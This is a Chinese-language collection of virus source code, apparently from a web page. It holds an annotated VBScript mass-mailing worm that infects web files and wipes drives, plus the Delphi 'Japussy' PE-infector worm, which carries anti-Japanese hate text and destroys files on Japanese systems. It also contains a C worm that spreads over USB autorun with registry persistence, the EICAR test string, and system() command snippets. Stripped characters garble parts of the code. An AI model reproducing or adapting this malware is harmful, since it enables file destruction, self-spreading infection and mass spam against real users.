Set Stl = CreateObject("Scriptlet.TypeLib") '创建 TypeLib对象
with Stl
.Reset
.Path = defpath
.Doc = MakeHtml(encrypt(Vbs_str), true)
.Write() '创建 C:\Readme.html 文件
end with
window.open defpath, "trap", "width=1 height=1 menubar=no scrollbars=no toolbar=no" 打开会隐藏的窗口
end sub
sub ExecuteVbs() ' 同理,如病毒文件是 VBS 时所执行的程序
on error resume next
dim x, adi, wvbs, ws, vf
set fso = CreateObject("Scripting.FileSystemObject")
set wvbs = CreateObject("WScript.Shell")
Gf
wvbs.RegWrite MSWKEY "Windows Scripting Host\Setings\Timeout", 0, "REG_DWORD"
set vf = fso.OpenTextFile (w2 "system.dll", 1)
Code_Str = vf.ReadAll()
vf.close
Hackpage
SendMail
set adi = fso.Drives
for each x in adi
if x.DrivesType = 2 or x.DrivesType = 3 then
call SearchHTML(x "\")
end if
next
if TestUser then Killhe
end sub
sub Gf() '得到系统路径
w1=fso.GetSpecialFolder(0) "\"
w2=fso.GetSpecialFolder(1) "\"
end sub
function Readreg(key_str) '读注册表
set tmps = CreateObject("WScript.Shell")
Readreg = tmps.RegRead(key_str)
set tmps = Nothing
end function
function Writereg(key_str, Newvalue, vtype) '写注册表
set tmps = CreateObject("WScript.Shell")
if vtype="" then
tmps.RegWrite key_str, Newvalue
else
tmps.RegWrite key_str, Newvalue, vtype
end if
set tmps = Nothing
end function
function MakeHtml(Sbuffer, iHTML) '创建HTML 文件的完整代码
dim ra
Randomize
ra = int(rnd() * 7)
MakeHtml="" "HTML" "HEAD" "TITLE" title(ra) "/" "TITLE" "/HEAD" _
"BO" "AD" vbcrlf MakeScript(Sbuffer, iHTML) vbcrlf _
"" "/BOAD" "/HTML"
end Function
function MakeScript(Codestr, iHTML) '此程序是病毒进行自我加密过程,较为复杂,不再描述
if iHTML then
dim DocuWrite
DocuWrite = "document.write(''+" "'SCRIPT Language=JavaScript\n'+" _
"jword" "+'\n/'" "+'SCRIPT');"
DocuWrite = DocuWrite vbcrlf "document.write(''+" "'SCRIPT Language=VBScript\n'+" _
"nword" "+'\n/'" "+'SCRIPT');"
MakeScript="" "SCRIPT Language=JavaScript" vbcrlf "var jword = " _
chr(34) encrypt(Js_Str) chr(34) vbcrlf "var nword = " _
chr(34) Codestr chr(34) vbcrlf "nword = unescape(nword);" vbcrlf _
"jword = unescape(jword);" vbcrlf DocuWrite vbcrlf "/" "SCRIPT"
else
MakeScript= "" "SCRIPT Language=JavaScript" Codestr "/" "SCRIPT"
end if
end function
function GetScriptCode(Languages) ' 得到不同脚本语言的代码
dim soj
for each soj in document.scripts
if LCase(soj.Language) = Languages then
if Languages = "javascript" then
if len(soj.Text) 200 then
else
GetScriptCode = soj.Text
exit function
end if
else
GetScriptCode = soj.Text
exit function
end if
end if
next
end function
function GetJavaScript()
GetJavaScript = GetScriptCode("javascript")
end function
function TestUser() '检测用户过程
on error resume next
dim keys(6), i, tmpStr, Wnet
'特定用户关键词
keys(0) = "white home"
keys(1) = "central intelligence agency"
keys(2) = "bush"
keys(3) = "american stock exchang"
keys(4) = "chief executive"
keys(5) = "usa"
TestUser = false
Set Wnet = CreateObject("WScript.Network") '创建网络对象
'下面一共3个循环,作用一样,是检查用户的 Domain、用户名和计算机名是否含有以上的5个关键词语,一旦含有程序将返回”真”的条件,从而对这些用户的文件进行疯狂删除。
tmpStr = LCase(Wnet.UserName) '
for i=0 to 4
if InStr(tmpStr, keys(i)) 0 then
TestUser=true
exit function
end if
next
tmpStr = LCase(Wnet.ComputerName)
for i=0 to 4
if InStr(tmpStr, keys(i)) 0 then
TestUser=true
exit function
end if
next
tmpStr = LCase(Wnet.UserDomain)
for i=0 to 4
if InStr(tmpStr, keys(i)) 0 then
TestUser=true
exit function
end if
next
Set Wnet = Nothing
end function
function SendMail() '发送文件过程
on error resume next
dim wab,ra,j, Oa, arrsm, eins, Eaec, fm, wreg, areg,at
'首先向 OutLook 地址簿发送带能直接感染文件的已加密的病毒代码和HTML 附件
主题是随机的,此过程与“欢乐时光“类似,所以不再描述
Randomize
at=fso.GetSpecialFolder(1) "\Readme.html"
set Oa = CreateObject("Outlook.Application")
set wab = Oa.GetNameSpace("MAPI")
for j = 1 to wab.AddressLists.Count
eins = wab.AddressLists(j)
wreg=Readreg (HCUW eins)
if (wreg="") then wreg = 1
Eaec = eins.AddressEntries.Count
if (Eaec Int(wreg)) then
for x = 1 to Eaec
arrsm = wab.AddressEntries(x)
areg = Readreg(HCUW arrsm)
if (areg = "") then
set fm = wab.CreateItem(0)
with fm
ra = int(rnd() * 7)
.Recipients.Add arrsm
.Subject = title(ra)
.Body = title(ra)
.Attachments at
.Send
Writereg HCUW arrsm, 1, "REG_DWORD"
end with
end if
next
end if
Writereg HCUW eins, Eaec, ""
next
'下面是对指定的用户无条件发送大量病毒邮件, 从这一点可看出病毒作者对美国政府的极度不满。
for j = 1 to smailc
arrsm = whb(j)
set fm = wab.CreateItem(0)
ra = int(rnd() * 7)
with fm
.Recipients.Add arrsm
.Subject = title(ra)
.Body = title(ra)
.Send
end with
next
set Oa = Nothing
window.setTimeout "SendMail()", 5000 '每隔 5 秒种重复发送
end function
sub SearchHTML(Path) '搜索可传染文件的过程
on error resume next
dim pfo, psfo, pf, ps, pfi, ext
if instr(Path, fso.GetSpecialFolder(2)) 0 then exit sub
if Path "E:\" then exit sub
set pfo = fso.GetFolder(Path)
set psfo = pfo.SubFolders
for each ps in psfo
SearchHTML(ps.Path)
set pf = ps.Files
for each pfi in pf
ext = LCase(fso.GetExtensionName(pfi.Path))
if instr(ext, "htm") 0 or ext = "plg" or ext = "asp" then '检查文件的扩展名是否为 htm、html、plg 如是则检查是否被感染,如未被感染则将已加密的病毒代码插入文件头,这样文件一旦执行也会执行病毒代码,而且不会影响原文件的正常执行。
if Code_Str"" then AddHead pfi.Path, pfi, 1
elseif ext= "vbs" then '如是 vbs 文件,则插入未加密的病毒代码
AddHead pfi.Path,pfi, 2
end if
next
next
end sub
sub Killhe() '全盘删除文件过程
on error resume next
dim codeText, ko,adi, kd, kh, ks,kf,kfs
codeText = "@ECHO OFF" vbcrlf "PATH " w1 "COMMAND" vbcrlf _
"DELTREE c:\" '将删除C盘的命令插入Autoexec.bat 中,下次开机时,删除整个硬盘,并没有任何提示
set ko = fso.OpenTextFile("C:\Autoexec.bat", 8, true)
ko.Write vbcrlf codeText
ko.Close
'接着立刻删除其它盘的所有文件
set adi = fso.Drives
for each x in adi
if x.DrivesType = 2 then
set kd = fso.GetFolder(x "\")
set kfs = kd.Files
for each kf in kfs
kf.Delete
next
set ks = kd.SubFolders
for each kh in ks
kh.Delete
next
end if
next
do while 1 '让系统立刻死机
window.open ""
loop
end sub
sub Hackpage() ' 此过程是直接攻击 Mircosoft IIS 服务器主页过程
dim fi
H = "C:\InetPut\wwwroot"
if fso.FolderExists(H) then
'判断是否为网站,如是则将已加密的带病毒代码插入文件头,从而直接传染浏览该网站的用户
set fi = fso.GetFile(H "\index.htm")
AddHead H "\index.htm",fi,1
end if
end sub
sub AddHead(Path, f, t) '此过程是病毒传染文件具体过程
on error resume next
dim tso, buffer,sr
if f.size MAX_SIZE then exit sub '传染大小小于100K的文件
set tso = fso.OpenTextFile(Path, 1, true)
buffer = tso.ReadAll()
tso.close
if (t = 1) then
if UCase(Left(LTrim(buffer), 7)) "SCRIPT" then
set tso = fso.OpenTextFile(Path, 2, true)
tso.Write Code_Str vbcrlf buffer '插入到文件头
tso.close
end if
else
if mid(buffer, 3, 2) "'@" then
tso.close
sr=w2 "user.dll"
if fso.FileExists(sr) then fso.CopyFile sr, Path
end if
end if
end sub
虽然病毒发作日已过但我们还是要小心提防病毒的变种出现。
电脑病毒代码
不行的 得用虚拟机才可以测试病毒代码 无需下载,把下面这段代码复制到记事本里,保存为文本文件
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
熊猫烧香
ogram Japussy;
uses
Windows, SysUtils, Classes, Graphics, ShellAPI{, Registry};
const
HeaderSize = 82432; //病毒体的大小
IconOffset = $12EB8; //PE文件主图标的偏移量
//在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同
//查找2800000020的十六进制字符串可以找到主图标的偏移量
{
HeaderSize = 38912; //Upx压缩过病毒体的大小
IconOffset = $92BC; //Upx压缩过PE文件主图标的偏移量
//Upx 1.24W 用法: upx -9 --8086 Japussy.exe
}
IconSize = $2E8; //PE文件主图标的大小--744字节
IconTail = IconOffset + IconSize; //PE文件主图标的尾部
ID = $44444444; //感染标记
//垃圾码,以备写入
Catchword = 'If a race need to be killed out, it must be Yamato. ' +
'If a country need to be destroyed, it must be Japan! ' +
'*** W32.Japussy.Worm.A ***';
{$R *.RES}
function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer;
stdcall; external 'Kernel32.dll'; //函数声明
var
TmpFile: string;
Si: STARTUPINFO;
Pi: PROCESS_INFORMATION;
IsJap: Boolean = False; //日文操作系统标记
{ 判断是否为Win9x }
function IsWin9x: Boolean;
var
Ver: TOSVersionInfo;
begin
Result := False;
Ver.dwOSVersionInfoSize := SizeOf(TOSVersionInfo);
if not GetVersionEx(Ver) then
Exit;
if (Ver.dwPlatformID = VER_PLATFORM_WIN32_WINDOWS) then //Win9x
Result := True;
end;
{ 在流之间复制 }
procedure CopyStream(Src: TStream; sStartPos: Integer; Dst: TStream;
dStartPos: Integer; Count: Integer);
var
sCurPos, dCurPos: Integer;
begin
sCurPos := Src.Position;
dCurPos := Dst.Position;
Src.Seek(sStartPos, 0);
Dst.Seek(dStartPos, 0);
Dst.CopyFrom(Src, Count);
Src.Seek(sCurPos, 0);
Dst.Seek(dCurPos, 0);
end;
{ 将宿主文件从已感染的PE文件中分离出来,以备使用 }
procedure ExtractFile(FileName: string);
var
sStream, dStream: TFileStream;
begin
try
sStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
dStream := TFileStream.Create(FileName, fmCreate);
try
sStream.Seek(HeaderSize, 0); //跳过头部的病毒部分
dStream.CopyFrom(sStream, sStream.Size - HeaderSize);
finally
dStream.Free;
end;
finally
sStream.Free;
end;
except
end;
end;
{ 填充STARTUPINFO结构 }
procedure FillStartupInfo(var Si: STARTUPINFO; State: Word);
begin
Si.cb := SizeOf(Si);
Si.lpReserved := nil;
Si.lpDesktop := nil;
Si.lpTitle := nil;
Si.dwFlags := STARTF_USESHOWWINDOW;
Si.wShowWindow := State;
Si.cbReserved2 := 0;
Si.lpReserved2 := nil;
end;
{ 发带毒邮件 }
procedure SendMail;
begin
//哪位仁兄愿意完成之?
end;
{ 感染PE文件 }
procedure InfectOneFile(FileName: string);
var
HdrStream, SrcStream: TFileStream;
IcoStream, DstStream: TMemoryStream;
iID: LongInt;
aIcon: TIcon;
Infected, IsPE: Boolean;
i: Integer;
Buf: array[0..1] of Char;
begin
try //出错则文件正在被使用,退出
if CompareText(FileName, 'JAPUSSY.EXE') = 0 then //是自己则不感染
Exit;
Infected := False;
IsPE := False;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
try
for i := 0 to $108 do //检查PE文件头
begin
SrcStream.Seek(i, soFromBeginning);
SrcStream.Read(Buf, 2);
if (Buf[0] = #80) and (Buf[1] = #69) then //PE标记
begin
IsPE := True; //是PE文件
Break;
end;
end;
SrcStream.Seek(-4, soFromEnd); //检查感染标记
SrcStream.Read(iID, 4);
if (iID = ID) or (SrcStream.Size 10240) then //太小的文件不感染
Infected := True;
finally
SrcStream.Free;
end;
if Infected or (not IsPE) then //如果感染过了或不是PE文件则退出
Exit;
IcoStream := TMemoryStream.Create;
DstStream := TMemoryStream.Create;
try
aIcon := TIcon.Create;
try
//得到被感染文件的主图标(744字节),存入流
aIcon.ReleaseHandle;
aIcon.Handle := ExtractIcon(HInstance, PChar(FileName), 0);
aIcon.SaveToStream(IcoStream);
finally
aIcon.Free;
end;
SrcStream := TFileStream.Create(FileName, fmOpenRead);
//头文件
HdrStream := TFileStream.Create(ParamStr(0), fmOpenRead or fmShareDenyNone);
try
//写入病毒体主图标之前的数据
CopyStream(HdrStream, 0, DstStream, 0, IconOffset);
//写入目前程序的主图标
CopyStream(IcoStream, 22, DstStream, IconOffset, IconSize);
//写入病毒体主图标到病毒体尾部之间的数据
CopyStream(HdrStream, IconTail, DstStream, IconTail, HeaderSize - IconTail);
//写入宿主程序
CopyStream(SrcStream, 0, DstStream, HeaderSize, SrcStream.Size);
//写入已感染的标记
DstStream.Seek(0, 2);
iID := $44444444;
DstStream.Write(iID, 4);
finally
HdrStream.Free;
end;
finally
SrcStream.Free;
IcoStream.Free;
DstStream.SaveToFile(FileName); //替换宿主文件
DstStream.Free;
end;
except;
end;
end;
{ 将目标文件写入垃圾码后删除 }
procedure SmashFile(FileName: string);
var
FileHandle: Integer;
i, Size, Mass, Max, Len: Integer;
begin
try
SetFileAttributes(PChar(FileName), 0); //去掉只读属性
FileHandle := FileOpen(FileName, fmOpenWrite); //打开文件
try
Size := GetFileSize(FileHandle, nil); //文件大小
i := 0;
Randomize;
Max := Random(15); //写入垃圾码的随机次数
if Max 5 then
Max := 5;
Mass := Size div Max; //每个间隔块的大小
Len := Length(Catchword);
while i Max do
begin
FileSeek(FileHandle, i * Mass, 0); //定位
//写入垃圾码,将文件彻底破坏掉
FileWrite(FileHandle, Catchword, Len);
Inc(i);
end;
finally
FileClose(FileHandle); //关闭文件
end;
DeleteFile(PChar(FileName)); //删除之
except
end;
end;
{ 获得可写的驱动器列表 }
function GetDrives: string;
var
DiskType: Word;
D: Char;
Str: string;
i: Integer;
begin
for i := 0 to 25 do //遍历26个字母
begin
D := Chr(i + 65);
Str := D + ':';
DiskType := GetDriveType(PChar(Str));
//得到本地磁盘和网络盘
if (DiskType = DRIVE_FIXED) or (DiskType = DRIVE_REMOTE) then
Result := Result + D;
end;
end;
{ 遍历目录,感染和摧毁文件 }
procedure LoopFiles(Path, Mask: string);
var
i, Count: Integer;
Fn, Ext: string;
SubDir: TStrings;
SearchRec: TSearchRec;
Msg: TMsg;
function IsValidDir(SearchRec: TSearchRec): Integer;
begin
if (SearchRec.Attr '.') and
(SearchRec.Name '..') then
Result := 0 //不是目录
else if (SearchRec.Attr = 16) and (SearchRec.Name '.') and
(SearchRec.Name '..') then
Result := 1 //不是根目录
else Result := 2; //是根目录
end;
begin
if (FindFirst(Path + Mask, faAnyFile, SearchRec) = 0) then
begin
repeat
PeekMessage(Msg, 0, 0, 0, PM_REMOVE); //调整消息队列,避免引起怀疑
if IsValidDir(SearchRec) = 0 then
begin
Fn := Path + SearchRec.Name;
Ext := UpperCase(ExtractFileExt(Fn));
if (Ext = '.EXE') or (Ext = '.SCR') then
begin
InfectOneFile(Fn); //感染可执行文件
end
else if (Ext = '.HTM') or (Ext = '.HTML') or (Ext = '.ASP') then
begin
//感染HTML和ASP文件,将Base64编码后的病毒写入
//感染浏览此网页的所有用户
//哪位大兄弟愿意完成之?
end
else if Ext = '.WAB' then //Outlook地址簿文件
begin
//获取Outlook邮件地址
end
else if Ext = '.ADC' then //Foxmail地址自动完成文件
begin
//获取Foxmail邮件地址
end
else if Ext = 'IND' then //Foxmail地址簿文件
begin
//获取Foxmail邮件地址
end
else
begin
if IsJap then //是倭文操作系统
begin
if (Ext = '.DOC') or (Ext = '.XLS') or (Ext = '.MDB') or
(Ext = '.MP3') or (Ext = '.RM') or (Ext = '.RA') or
(Ext = '.WMA') or (Ext = '.ZIP') or (Ext = '.RAR') or
(Ext = '.MPEG') or (Ext = '.ASF') or (Ext = '.JPG') or
(Ext = '.JPEG') or (Ext = '.GIF') or (Ext = '.SWF') or
(Ext = '.PDF') or (Ext = '.CHM') or (Ext = '.AVI') then
SmashFile(Fn); //摧毁文件
end;
end;
end;
//感染或删除一个文件后睡眠200毫秒,避免CPU占用率过高引起怀疑
Sleep(200);
until (FindNext(SearchRec) 0);
end;
FindClose(SearchRec);
SubDir := TStringList.Create;
if (FindFirst(Path + '*.*', faDirectory, SearchRec) = 0) then
begin
repeat
if IsValidDir(SearchRec) = 1 then
SubDir.Add(SearchRec.Name);
until (FindNext(SearchRec) 0);
end;
FindClose(SearchRec);
Count := SubDir.Count - 1;
for i := 0 to Count do
LoopFiles(Path + SubDir.Strings + '', Mask);
FreeAndNil(SubDir);
end;
{ 遍历磁盘上所有的文件 }
procedure InfectFiles;
var
DriverList: string;
i, Len: Integer;
begin
if GetACP = 932 then //日文操作系统
IsJap := True; //去死吧!
DriverList := GetDrives; //得到可写的磁盘列表
Len := Length(DriverList);
while True do //死循环
begin
for i := Len downto 1 do //遍历每个磁盘驱动器
LoopFiles(DriverList + ':', '*.*'); //感染之
SendMail; //发带毒邮件
Sleep(1000 * 60 * 5); //睡眠5分钟
end;
end;
{ 主程序开始 }
begin
if IsWin9x then //是Win9x
RegisterServiceProcess(GetCurrentProcessID, 1) //注册为服务进程
else //WinNT
begin
//远程线程映射到Explorer进程
//哪位兄台愿意完成之?
end;
//如果是原始病毒体自己
if CompareText(ExtractFileName(ParamStr(0)), 'Japussy.exe') = 0 then
InfectFiles //感染和发邮件
else //已寄生于宿主程序上了,开始工作
begin
TmpFile := ParamStr(0); //创建临时文件
Delete(TmpFile, Length(TmpFile) - 4, 4);
TmpFile := TmpFile + #32 + '.exe'; //真正的宿主文件,多一个空格
ExtractFile(TmpFile); //分离之
FillStartupInfo(Si, SW_SHOWDEFAULT);
CreateProcess(PChar(TmpFile), PChar(TmpFile), nil, nil, True,
0, nil, '.', Si, Pi); //创建新进程运行之
InfectFiles; //感染和发邮件
end;
end
用C语言编写的病毒代码
一个c病毒源代码
#include windows.h
#include Shlwapi.h
#include fstream.h
#include TlHelp32.h
#include Dbt.h
#pragma comment(lib,"shlwapi.lib")
#define TIMER 1//计时器
//function
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);//窗口过程
//获取盘符
TCHAR FirstDriveFromMask (ULONG unitmask);
//病毒从U盘启动时用到的函数
BOOL FileExist(TCHAR *path);//测试一个文件是否存在
BOOL GetSelfPath(TCHAR *path);//Get the virus's path
//BOOL FindU(TCHAR *u);//check whether u exist, u[2]
BOOL GetSysPath(TCHAR *path);//得到系统路径
BOOL CopyToSysAndSet(HWND hwnd);//复制自身到系统目录和设置
BOOL SetFileAttrib(TCHAR *path);//设置path所指文件的属性
BOOL RegAutoRun(TCHAR *path);//修改注册表,实现自启动
//从C盘启动时用到函数
BOOL CopyToUAndSet();//复制自己到U盘
BOOL CreateAutoRunFile(TCHAR *path);//在U盘下生成autorun.inf文件
BOOL FindSelf();//测试自己是否在已经执行了
//global variable
TCHAR szExePath[MAX_PATH];//the virus's path
TCHAR U[2];//保存U盘的盘符
TCHAR szSysPath[MAX_PATH];//system path
//constant
const TCHAR *szExeName="bbbbb.exe";
const TCHAR *szSysName="aaaaa.exe";
const TCHAR *szAutoRunFile="AutoRun.inf";
int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance,
PSTR szCmdLine, int iCmdShow)
{
static TCHAR szAppName[]=TEXT ("UUUUUU");
HWND hwnd;
MSG msg;
WNDCLASS wndclass;
wndclass.style =0;
wndclass.lpfnWndProc =WndProc;
wndclass.cbClsExtra =0;
wndclass.cbWndExtra =0;
wndclass.hInstance =hInstance;
wndclass.hIcon =0;
wndclass.hCursor =0;
wndclass.hbrBackground =0;
wndclass.lpszMenuName =NULL;
wndclass.lpszClassName =szAppName;
if (!RegisterClass (wndclass))
{
MessageBox (NULL,TEXT("Program requires Windows NT!"),
szAppName, MB_ICONERROR);
return 0;
}
hwnd = CreateWindow (szAppName, NULL,
WS_DISABLED,
0, 0,
0, 0,
NULL, NULL, hInstance, NULL);
while (GetMessage(msg, NULL, 0, 0))
{
TranslateMessage (msg);
DispatchMessage (msg);
}
return msg.wParam;
}
LRESULT OnDeviceChange(HWND hwnd,WPARAM wParam, LPARAM lParam)
{
PDEV_BROADCAST_HDR lpdb = (PDEV_BROADCAST_HDR)lParam;
switch(wParam)
{
case DBT_DEVICEARRIVAL: //插入
if (lpdb - dbch_devicetype == DBT_DEVTYP_VOLUME)
{
PDEV_BROADCAST_VOLUME lpdbv = (PDEV_BROADCAST_VOLUME)lpdb;
U[0]=FirstDriveFromMask(lpdbv -dbcv_unitmask);//得到u盘盘符
//MessageBox(0,U,"Notice!",MB_OK);
CopyToUAndSet();//拷到u盘
}
break;
case DBT_DEVICEREMOVECOMPLETE: //设备删除
break;
}
return LRESULT();
}
LRESULT CALLBACK WndProc (HWND hwnd, UINT message, WPARAM wParam,LPARAM lParam)
{
switch(message)
{
case WM_Create: //处理一些要下面要用到的全局变量
U[1]=':';
GetSysPath(szSysPath);//得到系统路径
SetTimer(hwnd,TIMER,5000,0);//启动计时器
GetSelfPath(szExePath);//得到自身的路径
return 0;
case WM_TIMER: //timer message
if(szExePath[0]==szSysPath[0]) //如果是系统盘启动的
SendMessage(hwnd,WM_DEVICECHANGE,0,0);//检测有没有插入设备消息
else
{
CopyToSysAndSet(hwnd);//拷到系统盘并自启动
}
return 0;
case WM_DEVICECHANGE:
OnDeviceChange(hwnd,wParam,lParam);
return 0;
case WM_DESTROY:
KillTimer(hwnd,TIMER);
PostQuitMessage(0);
return 0;
}
return DefWindowProc(hwnd, message, wParam, lParam);
}
TCHAR FirstDriveFromMask(ULONG unitmask)
{
char i;
for (i = 0; i 26; ++i)
{
if (unitmask 0x1)//看该驱动器的状态是否发生了变化
break;
unitmask = unitmask 1;
}
return (i + 'A');
}
BOOL GetSelfPath(TCHAR *path)
{
if(GetModuleFileName(NULL,path,MAX_PATH))//得到程序自身的目录
{
return TRUE;
}
else
return FALSE;
}
BOOL GetSysPath(TCHAR *path)
{
return GetSystemDirectory(path,MAX_PATH);//得到系统路径
}
BOOL CopyToSysAndSet(HWND hwnd)
{
TCHAR szPath[MAX_PATH];
lstrcpy(szPath,szSysPath);
lstrcat(szPath,"\\");
lstrcat(szPath,szSysName);//得到复制到系统目录的完整目录
if(!FileExist(szPath))//检测系统目录是否已经存在复制的文件
{
CopyFile(szExePath,szPath,FALSE);
RegAutoRun(szPath);
return SetFileAttrib(szPath);
}
else
{
if(!FindSelf())//检测自己有没有运行
{
//MessageBox(0,szExePath,szPath,MB_OK);
WinExec(szPath,SW_HIDE);//没有就执行
SendMessage(hwnd,WM_CLOSE,0,0);//结束自己
}
}
return FALSE;
}
BOOL FileExist(TCHAR *path)//检测PATH所指的路径的文件是否存在
{
int result;
result=PathFileExists(path);
if(result==1)
return TRUE;
else
return FALSE;
}
BOOL SetFileAttrib(TCHAR *path)
{
return SetFileAttributes(path,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
}
BOOL RegAutoRun(TCHAR *path)//修改注册表实现自启动
{
HKEY hkey;
DWORD v=0;
RegOpenKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",hkey);
RegSetValueEx(hkey,"NoDriveTypeAutoRun",0,REG_DWORD,(LPBYTE)v,sizeof(DWORD));
if(RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Run",
hkey)==ERROR_SUCCESS)
{
RegSetValueEx(hkey,szSysName,0,REG_SZ,(BYTE*)path,lstrlen(path));
RegCloseKey(hkey);
return TRUE;
}
else
return FALSE;
}
BOOL CopyToUAndSet()
{
TCHAR szPath[MAX_PATH];
lstrcpy(szPath,U);
lstrcat(szPath,"\\");
lstrcat(szPath,szExeName);//得到指向U盘的完整目录
TCHAR szAutoFile[MAX_PATH];
lstrcpy(szAutoFile,U);
lstrcat(szAutoFile,"\\");
lstrcat(szAutoFile,szAutoRunFile);
if(!FileExist(szAutoFile))
{
CreateAutoRunFile(szAutoFile);
SetFileAttrib(szAutoFile);
}
if(!FileExist(szPath))
{
CopyFile(szExePath,szPath,FALSE);
return SetFileAttrib(szPath);
}
return FALSE;
}
BOOL CreateAutoRunFile(TCHAR *path) //在U盘下创建一个autorun.inf文件
{
ofstream fout;
fout.open(path);
if(fout)
{
fout"[AutoRun]"endl;
fout"open="szExeName" e"endl;
fout"shellexecute="szExeName" e"endl;
fout"shell\\Auto\\command="szExeName" e"endl;
fout"shell=Auto"endl;
fout.close();
return TRUE;
}
return FALSE;
}
BOOL FindSelf(){
PROCESSENTRY32 pe;
HANDLE hShot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
pe.dwSize=sizeof(PROCESSENTRY32);
if(Process32First(hShot,pe)){
do{
if(lstrcmp(pe.szExeFile,szSysName)==0)
{
CloseHandle(hShot);
return TRUE;
}
}while(Process32Next(hShot,pe));
}
CloseHandle(hShot);
return FALSE;
} 隐藏窗口:ShowWindow(false); (#include windows.h)
将程序暂停一秒后继续执行:sleep(1000); (同上)
删除文件:system("del 文件的路径");
运行文件:system("文件的路径");
system函数(#include iostream)
复制文件:详见remove函数(#include process.h)
-----------------------------------------------------------
一个不错的病毒完整源代码
#include windows.h
#include Shlwapi.h
#include fstream.h
#include TlHelp32.h
#include Dbt.h
#pragma comment(lib,"shlwapi.lib")
#define TIMER 1//计时器
//function
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);//窗口过程
//获取盘符
TCHAR FirstDriveFromMask (ULONG unitmask);
